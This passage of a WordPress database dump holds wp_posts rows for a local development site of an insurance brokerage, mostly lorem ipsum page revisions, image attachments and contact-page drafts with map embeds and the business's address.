vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>\r\n</div>','General','','inherit','open','open','','9-revision-v1','','','2014-04-22 22:25:35','2014-04-22 22:25:35','',9,'http://localhost/empire/?p=56',0,'revision','',0),(57,1,'2014-04-22 22:31:28','2014-04-22 22:31:28','','news-post','','inherit','open','open','','news-post','','','2014-04-22 22:31:28','2014-04-22 22:31:28','',10,'http://localhost/empire/wp-content/uploads/2014/04/news-post.png',0,'attachment','image/png',0),(58,1,'2014-04-22 22:31:33','2014-04-22 22:31:33','<div class=\"about-home-section\">\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a><b>News</b></div>\r\n<div class=\"line\"></div>\r\n<div class=\"page-post-info\">Posted at 03:41 PM ET, 11/23/2013</div>\r\n<div class=\"page-post-title\">Lorem ipsum dolor sit amet, consectetur lorem</div>\r\n<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"page-post-image\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/news-post.png\"><img class=\"alignnone size-medium wp-image-57\" src=\"http://localhost/empire/wp-content/uploads/2014/04/news-post-300x120.png\" alt=\"news-post\" width=\"300\" height=\"120\" /></a></div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>\r\n</div>','News','','inherit','open','open','','10-revision-v1','','','2014-04-22 22:31:33','2014-04-22 22:31:33','',10,'http://localhost/empire/?p=58',0,'revision','',0),(77,1,'2014-04-23 02:44:21','2014-04-23 02:44:21','','content-wrapper-bg','','inherit','open','open','','content-wrapper-bg','','','2014-04-23 02:44:21','2014-04-23 02:44:21','',0,'http://localhost/empire/wp-content/uploads/2014/04/content-wrapper-bg.png',0,'attachment','image/png',0),(78,1,'2014-04-23 02:50:28','2014-04-23 02:50:28','Etiam quis erat sit amet velit malesuada posuere. Phasellus nulla libero, porta vel nibh vel, pellentesque gravida mi.','Lorem sum dolor sit','','inherit','open','open','','47-revision-v1','','','2014-04-23 02:50:28','2014-04-23 02:50:28','',47,'http://localhost/empire/?p=78',0,'revision','',0),(91,1,'2014-04-23 03:11:41','2014-04-23 03:11:41','','about-title-img','','inherit','open','open','','about-title-img-2','','','2014-04-23 03:11:41','2014-04-23 03:11:41','',0,'http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png',0,'attachment','image/png',0),(103,1,'2014-04-23 23:53:53','2014-04-23 23:53:53','<div class=\"about-home-section\">\r\n[userform]\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a> <strong>Empire Insurance Brokerage</strong></div>\r\n<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-23 23:53:53','2014-04-23 23:53:53','',6,'http://localhost/empire/?p=103',0,'revision','',0),(126,1,'2014-04-24 06:03:38','2014-04-24 06:03:38','<div class=\"about-home-section\">\r\n[map w=\"500\" h=\"300\" link=\"yourlink\"]\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a> <strong>Empire Insurance Brokerage</strong></div>\r\n<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-24 06:03:38','2014-04-24 06:03:38','',6,'http://localhost/empire/?p=126',0,'revision','',0),(127,1,'2014-04-24 06:04:33','2014-04-24 06:04:33','<div class=\"about-home-section\">\r\n[map w=\"500\" h=\"300\" link=\"https://maps.google.ca/maps?f=q&source=s_q&hl=en&geocode=&q=Toronto,+ON&aq=0&oq=Toronto,+On&sll=50.289339,-85.803223&sspn=3.08503,8.453979&ie=UTF8&hq=&hnear=Toronto,+Toronto+Division,+Ontario&t=m&ll=43.653218,-79.383173&spn=0.017078,0.058279&z=14&iwloc=A&\"]\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a> <strong>Empire Insurance Brokerage</strong></div>\r\n<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-24 06:04:33','2014-04-24 06:04:33','',6,'http://localhost/empire/?p=127',0,'revision','',0),(128,1,'2014-04-24 06:05:12','2014-04-24 06:05:12','<div class=\"about-home-section\">\r\n\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a> <strong>Empire Insurance Brokerage</strong></div>\r\n<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-24 06:05:12','2014-04-24 06:05:12','',6,'http://localhost/empire/?p=128',0,'revision','',0),(129,1,'2014-04-24 14:15:17','2014-04-24 14:15:17','','Chaya Klein','','publish','closed','closed','','new-client','','','2015-08-20 21:39:28','2015-08-20 21:39:28','',0,'http://localhost/empire/?post_type=clients&p=129',2,'clients','',0),(130,1,'2014-04-24 15:10:45','0000-00-00 00:00:00','','Member','','draft','open','open','','','','','2014-04-24 15:10:45','2014-04-24 15:10:45','',0,'http://localhost/empire/?post_type=team&p=130',0,'team','',0),(131,1,'2014-04-24 15:12:58','2014-04-24 15:12:58','','Roisy Deutsch','','publish','closed','closed','','client','','','2015-08-20 21:39:37','2015-08-20 21:39:37','',0,'http://localhost/empire/?post_type=clients&p=131',3,'clients','',0),(145,1,'2014-04-26 23:33:07','2014-04-26 23:33:07','','logo','','inherit','open','open','','logo','','','2014-04-26 23:33:07','2014-04-26 23:33:07','',4,'http://localhost/empire/wp-content/uploads/2014/04/logo.png',0,'attachment','image/png',0),(148,1,'2014-04-28 05:31:21','2014-04-28 05:31:21','[map w=\"500\" h=\"300\" link=\"yourlink\"]','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:31:21','2014-04-28 05:31:21','',8,'http://localhost/empire/?p=148',0,'revision','',0),(149,1,'2014-04-28 06:27:24','2014-04-28 06:27:24','\n<div class=\"col-sm-5\">\n<div class=\"contact-address\">\n<div class=\"title\">\n\nEmpire Insurance Brokerage\n\n</div>\n38 Skillman Street\n\nBrooklyn, NY 11205\n\nphone (718) 218-9647\n\nfax (718)-599-1440\n\n<a href=\"#\">info@empireins.com</a>\n\n</div>\n</div>\n<div class=\"col-sm-7\">[map]</div>\n</div>','contact','','inherit','open','open','','8-autosave-v1','','','2014-04-28 06:27:24','2014-04-28 06:27:24','',8,'http://localhost/empire/?p=149',0,'revision','',0),(150,1,'2014-04-28 05:33:51','2014-04-28 05:33:51','[map w=\"500\" h=\"300\" link=\"yourlink\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div class=\"google-map\">\r\n <iframe src=\"https://maps.google.com/?ie=UTF8&ll=30.145127,-86.308594&spn=39.728498,86.572266&t=m&z=4&output=embed\"></iframe>\r\n </div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:33:51','2014-04-28 05:33:51','',8,'http://localhost/empire/?p=150',0,'revision','',0),(151,1,'2014-04-28 05:35:42','2014-04-28 05:35:42','[map w=\"500\" h=\"300\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div class=\"google-map\">\r\n <iframe src=\"https://maps.google.com/?ie=UTF8&ll=30.145127,-86.308594&spn=39.728498,86.572266&t=m&z=4&output=embed\"></iframe>\r\n </div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:35:42','2014-04-28 05:35:42','',8,'http://localhost/empire/?p=151',0,'revision','',0),(152,1,'2014-04-28 05:42:14','2014-04-28 05:42:14','[map w=\"500\" h=\"300\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div style=\"width: 600px\"><iframe width=\"600\" height=\"300\" src=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"><a href=\"http://www.regiohelden.de/google-maps/\">Google Maps Generator</a> von <a href=\"http://www.regiohelden.de/\">RegioHelden</a></iframe><br /><span style=\"font-size: 9px;\"><a href=\"http://www.regiohelden.de/google-maps/\" style=\"font-size: 9px;\">Google Maps Generator</a> by <a href=\"http://www.regiohelden.de/\" style=\"font-size: 9px;\">RegioHelden</a></span></div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:42:14','2014-04-28 05:42:14','',8,'http://localhost/empire/?p=152',0,'revision','',0),(153,1,'2014-04-28 05:45:25','2014-04-28 05:45:25','[map w=\"500\" h=\"300\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div class=\"google-map\"><iframe width=\"600\" height=\"300\" src=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"><a href=\"http://www.regiohelden.de/google-maps/\">Google Maps Generator</a> von <a href=\"http://www.regiohelden.de/\">RegioHelden</a></iframe><br /><span style=\"font-size: 9px;\"><a href=\"http://www.regiohelden.de/google-maps/\" style=\"font-size: 9px;\">Google Maps Generator</a> by <a href=\"http://www.regiohelden.de/\" style=\"font-size: 9px;\">RegioHelden</a></span></div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:45:25','2014-04-28 05:45:25','',8,'http://localhost/empire/?p=153',0,'revision','',0),(154,1,'2014-04-28 05:47:15','2014-04-28 05:47:15','[map w=\"500\" h=\"300\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div class=\"google-map\"><iframe width=\"600\" height=\"300\" src=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"></div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:47:15','2014-04-28 05:47:15','',8,'http://localhost/empire/?p=154',0,'revision','',0),(155,1,'2014-04-28 05:49:26','2014-04-28 05:49:26','[map w=\"500\" h=\"300\" link=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"]\r\n<div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> <b>News</b>\r\n</div>\r\n<div class=\"line\"></div>\r\n\r\n<div class=\"row\">\r\n <div class=\"col-sm-5\">\r\n <div class=\"contact-address\">\r\n <div class=\"title\">\r\n <p>Empire Insurance Brokerage</p>\r\n </div>\r\n <p>38 Skillman Street</p>\r\n <p>Brooklyn, NY 11205</p>\r\n <p>phone (718) 218-9647</p>\r\n <p>fax (718)-599-1440</p>\r\n <p><a href=\"#\">info@empireins.com</a></p>\r\n </div>\r\n </div>\r\n <div class=\"col-sm-7\">\r\n <div class=\"google-map\"><iframe width=\"600\" height=\"300\" src=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"></div>\r\n </div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:49:26','2014-04-28 05:49:26','',8,'http://localhost/empire/?p=155',0,'revision','',0),(156,1,'2014-04-28 05:51:06','2014-04-28 05:51:06','<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\"><img class=\"alignnone size-full wp-image-91\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a><b>News</b></div>\r\n<div class=\"line\"></div>\r\n<div class=\"row\">\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">\r\n<div class=\"google-map\"><iframe src=\"http://regiohelden.de/google-maps/map_en.php?width=600&height=300&hl=en&q=38%20Skillman%20Street%20Brooklyn%2C%20NY%2011205+(RegioHelden%20GmbH)&ie=UTF8&t=&z=13&iwloc=A&output=embed\" width=\"600\" height=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></div>\r\n</div>\r\n</div>\r\n</iframe></div>\r\n</div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:51:06','2014-04-28 05:51:06','',8,'http://localhost/empire/?p=156',0,'revision','',0),(157,1,'2014-04-28 05:55:34','2014-04-28 05:55:34','<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\"><img class=\"alignnone size-full wp-image-91\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a><b>News</b></div>\r\n<div class=\"line\"></div>\r\n<div class=\"row\">\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">\r\n[map]\r\n</div>\r\n</div>\r\n</iframe></div>\r\n</div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:55:34','2014-04-28 05:55:34','',8,'http://localhost/empire/?p=157',0,'revision','',0),(158,1,'2014-04-28 05:57:32','2014-04-28 05:57:32','<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\"><img class=\"alignnone size-full wp-image-91\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img1.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a><b>News</b></div>\r\n<div class=\"line\"></div>\r\n<div class=\"row\">\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">\r\n[map]\r\n</div>\r\n</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 05:57:32','2014-04-28 05:57:32','',8,'http://localhost/empire/?p=158',0,'revision','',0),(159,1,'2014-04-28 06:27:34','2014-04-28 06:27:34','\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">[map]</div>','contact','','inherit','open','open','','8-revision-v1','','','2014-04-28 06:27:34','2014-04-28 06:27:34','',8,'http://localhost/empire/?p=159',0,'revision','',0),(160,1,'2014-04-28 06:35:16','2014-04-28 06:35:16','<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-28 06:35:16','2014-04-28 06:35:16','',6,'http://localhost/empire/?p=160',0,'revision','',0),(162,1,'2014-04-28 06:43:38','2014-04-28 06:43:38','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','General','','inherit','open','open','','9-revision-v1','','','2014-04-28 06:43:38','2014-04-28 06:43:38','',9,'http://localhost/empire/?p=162',0,'revision','',0),(167,1,'2014-04-28 07:24:31','2014-04-28 07:24:31','\r\n<div class=\"page-post-info\">Posted at 03:41 PM ET, 11/23/2013</div>\r\n<div class=\"page-post-title\">Lorem ipsum dolor sit amet, consectetur lorem</div>\r\n<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"page-post-image\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/news-post.png\"><img class=\"alignnone 